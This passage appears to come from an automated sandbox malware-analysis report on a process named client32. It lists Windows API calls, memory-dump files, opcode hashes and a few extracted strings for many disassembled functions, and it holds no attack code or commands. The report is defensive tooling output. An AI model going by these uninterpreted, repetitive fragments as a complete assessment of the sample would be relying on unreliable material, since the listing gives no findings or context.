                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
                                                                                                                                                                                                    • API String ID: 0-2590468221
                                                                                                                                                                                                    • Opcode ID: 710b27b40b0a4c792919a9f347c6ea8630e6966d913ca68cc928894629ee96a0
                                                                                                                                                                                                    • Instruction ID: 4770ed406c6fb7e57171b754325481176f8a5424b671cdabab32e7e093209ee6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 710b27b40b0a4c792919a9f347c6ea8630e6966d913ca68cc928894629ee96a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63E15379F002119BDB24CF94CC90F6AB7AAFF89304F148299E9459F2C5DA30ED45CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 11161453
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1116146A
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 111614B3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 111614CA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecrementInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3448037634-0
                                                                                                                                                                                                    • Opcode ID: 33a4bedbe9cbbe826f9578e5f39413809773d621a65571af9793a5085f74bf77
                                                                                                                                                                                                    • Instruction ID: 8feff59e23e0463e21a325afddf574ff64394e5aa8a8e74378d639f460d44daf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a4bedbe9cbbe826f9578e5f39413809773d621a65571af9793a5085f74bf77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42417C75A04706AFEB118FAADC80A2AFBFCAF4030CF10486DE441E7650D7B2E924CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?,689C3061,?), ref: 689B69EB
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689B6A1B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                    • String ID: FAILED_REASON$LICENSE
                                                                                                                                                                                                    • API String ID: 3168844106-1913596546
                                                                                                                                                                                                    • Opcode ID: 214ed1eceff400a4b88f3bb9a35913cb1723a461bcb7f9c76b0c957817dc63fd
                                                                                                                                                                                                    • Instruction ID: 14a75bd1d2e1369e162711ffe65c7cc6daf26ed0c811ff2150acb328567166ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214ed1eceff400a4b88f3bb9a35913cb1723a461bcb7f9c76b0c957817dc63fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69419C32904502ABDB074E7899086AFBBF99F92349F844178DDA597300FB31F909C3D0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 689D65E3: GetOEMCP.KERNEL32(00000000,?,689DEF75,?,?,?), ref: 689D660C
                                                                                                                                                                                                      • Part of subcall function 689DD3B0: Sleep.KERNEL32(00000000,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7,689D6E81,00000000,?,689D6E81,0000000D), ref: 689DD3D1
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(85038B09), ref: 689D68FC
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 689D6921
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32 ref: 689D69B3
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 689D69D7
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 689D1C13
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: GetLastError.KERNEL32(00000000), ref: 689D1C25
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1703371082-0
                                                                                                                                                                                                    • Opcode ID: 8d4ba0beef8509e144ee54f63c5147f906e0867a18356527f6a65eec600bd488
                                                                                                                                                                                                    • Instruction ID: b5068eb145a478cf56d9a0ec50b4535dab68a67c6b2667f42240fbf3bd760a27
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d4ba0beef8509e144ee54f63c5147f906e0867a18356527f6a65eec600bd488
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53411375808A048FCB029F78D98475D7BF4AF1A328F90C469D9A1EB291CB38D840CBD8
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 110A7319
                                                                                                                                                                                                    • CreateRectRgn.GDI32(?,110A83D7,?,?), ref: 110A737B
                                                                                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 110A7388
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110A738F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateRect$CombineDeleteObject
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1735589438-0
                                                                                                                                                                                                    • Opcode ID: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
                                                                                                                                                                                                    • Instruction ID: 7c55b913b2b2c5e9ceebf247f0e200ebac5932dc0e21f1d57c3ddac5f96fd2c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F219236A00119ABCB04DBA9D884CBFB7BAEFC9710711C199FA46D3254E6309D42D7E1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,BBC4A55B,?,?,?,BBC4A55B), ref: 110CCA4A
                                                                                                                                                                                                      • Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,BBC4A55B), ref: 110CCAB2
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110CD2FB
                                                                                                                                                                                                      • Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 110CD328
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD33C
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD346
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3515130325-0
                                                                                                                                                                                                    • Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                                                                                                    • Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000000,?,?,?,?,?,689BD68F), ref: 689B596C
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,?,?,?,?,689BD68F), ref: 689B597D
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F4,?,?,?,?,?,689BD68F), ref: 689B59B7
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,?,?,?,?,689BD68F), ref: 689B59CC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3394196147-0
                                                                                                                                                                                                    • Opcode ID: 4b8345c161b4c37e7cdf2b77008ab64d9bccff3cb3aa509a4a7d75a8aab18e6c
                                                                                                                                                                                                    • Instruction ID: 7a7b249223269252bff41db9629150a08afbe6662fc116d930d04117da638d17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b8345c161b4c37e7cdf2b77008ab64d9bccff3cb3aa509a4a7d75a8aab18e6c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121B571D082089FDF04DFA8D9047AEBBF8FF89318F50815ED85AA7240D771AA45CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110590FC
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterTimetime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1178526778-0
                                                                                                                                                                                                    • Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                                                                                                    • Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                                                                                                                                                                    • API String ID: 3472027048-2181447511
                                                                                                                                                                                                    • Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                                                                                                    • Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?), ref: 689B68AE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689B68C3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                    • String ID: ERROR$RESULT
                                                                                                                                                                                                    • API String ID: 3168844106-833402571
                                                                                                                                                                                                    • Opcode ID: 6b5250676ba125080aef057b59549e8d02fdbd27080715e04c60a12c3f358cdd
                                                                                                                                                                                                    • Instruction ID: 5d6fa37a48959760513d879cd6d692c4a8bbefddfd35f0968dcf1de9fcaa299c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5250676ba125080aef057b59549e8d02fdbd27080715e04c60a12c3f358cdd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401F9F7D042413BEB144EA5AC0196F76AC9F95169F880439EA0AD7100F736E955C3E3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313CF
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313E5
